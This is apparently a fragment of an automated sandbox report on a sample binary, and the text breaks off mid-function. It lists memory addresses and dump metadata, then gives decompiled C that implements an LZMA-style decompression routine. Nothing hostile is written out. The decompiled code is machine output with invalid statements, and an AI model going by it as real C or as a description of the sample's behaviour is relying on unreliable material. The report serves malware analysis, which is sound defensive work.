0x00407302
0x00407305
0x00407307
0x0040730a
0x0040730e
0x00407310
0x00407310
0x00407311
0x00407314
0x00407317
0x004072d9
0x004072d9
0x004072e1
0x004072e6
0x004072e8
0x004072eb
0x004072eb
0x0040731a
0x00407321
0x004072ab
0x004072ab
0x004072ab
0x004072ab
0x00000000
0x00407323
0x00407323
0x00000000
0x00407323
0x00407321
0x00407234
0x00407234
0x00407237
0x00407239
0x0040723c
0x0040723f
0x00407242
0x00407244
0x00407247
0x0040724a
0x0040724a
0x0040724d
0x0040724d
0x00407250
0x00407257
0x0040722b
0x0040722b
0x0040722b
0x0040722b
0x00000000
0x00407259
0x00407259
0x00000000
0x00407259
0x00407257
0x004071dd
0x004071dd
0x004071e0
0x004071e2
0x004071e5
0x00000000
0x00000000
0x00406f44
0x00406f44
0x00406f48
0x0040758d
0x0040758d
0x00000000
0x0040758d
0x00406f4e
0x00406f4e
0x00406f51
0x00406f54
0x00406f57
0x00406f5a
0x00406f5d
0x00406f60
0x00406f62
0x00406f65
0x00406f68
0x00406f6b
0x00406f6d
0x00406f6d
0x00406f6d
0x00000000
0x00000000
0x004070cf
0x004070cf
0x004070d3
0x00407599
0x00407599
0x00000000
0x00407599
0x004070d9
0x004070d9
0x004070dc
0x004070df
0x004070e2
0x004070e4
0x004070e4
0x004070e4
0x004070e7
0x004070ea
0x004070ed
0x004070f0
0x004070f3
0x004070f6
0x004070f7
0x004070f9
0x004070f9
0x004070f9
0x004070fc
0x004070ff
0x00407102
0x00407105
0x00407105
0x00407105
0x00407108
0x0040710a
0x0040710a
0x00000000
0x00000000
0x0040734c
0x0040734c
0x0040734c
0x00407350
0x00000000
0x00000000
0x00407356
0x00407356
0x00407359
0x0040735c
0x0040735f
0x00407361
0x00407361
0x00407361
0x00407364
0x00407367
0x0040736a
0x0040736d
0x00407370
0x00407373
0x00407374
0x00407376
0x00407376
0x00407376
0x00407379
0x0040737c
0x0040737f
0x00407382
0x00407385
0x00407389
0x0040738b
0x0040738e
0x00000000
0x00407390
0x00407390
0x0040710d
0x0040710d
0x00000000
0x0040710d
0x0040738e
0x004075c3
0x004075c3
0x00000000
0x00000000
0x00406bf2
0x004075fa
0x004075fa
0x00000000
0x004075fa
0x00407447
0x004074c7
0x00407490

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
Instruction ID: 10cc2cc0f2c892254e5285b7a8bac4c216a70fda8fb68dfa7c3680dd08f727d3
Opcode Fuzzy Hash: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
Instruction Fuzzy Hash: 55A15571E04228DBDF28CFA8C8547ADBBB1FF44305F10842AD856BB281D778A986DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00407395 Relevance: 5.2, APIs: 4, Instructions: 208
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00407395() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
